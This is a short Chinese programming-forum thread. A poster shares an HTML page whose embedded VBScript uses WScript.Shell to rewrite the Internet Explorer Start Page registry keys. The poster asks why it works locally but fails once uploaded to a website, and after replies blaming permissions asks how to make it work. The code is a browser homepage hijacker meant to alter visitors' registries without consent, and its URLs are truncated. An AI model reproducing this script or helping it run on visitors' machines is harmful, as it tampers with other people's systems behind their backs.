注册 登录
编程论坛 JavaScript论坛

帮忙看看着个代码问题出在那里

bodyguard 发布于 2011-09-26 21:37, 647 次点击
程序代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www. xmlns="http://www. http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>无标题文档</title>
</head>

<body>
<script language="vbscript">

set lhwy=createobject("wscript.shell")



path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\Start Page"

tf=lhwy.regwrite(path,"http://www.)

set path=nothing

path="HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"

tf=lhwy.regwrite(path,"http://www.)

wscript.quit

</script>
</body>
</html>
为什么在本地测试  可以修改主页  但是上传到网站就不能修改主页了  请问  这是什么原因
3 回复
#2
zhangyao32872011-09-27 10:53
权限
#3
aspic2011-09-27 14:14
同上
#4
bodyguard2011-09-27 14:52
那要怎么修改才可以呢   非常感谢
1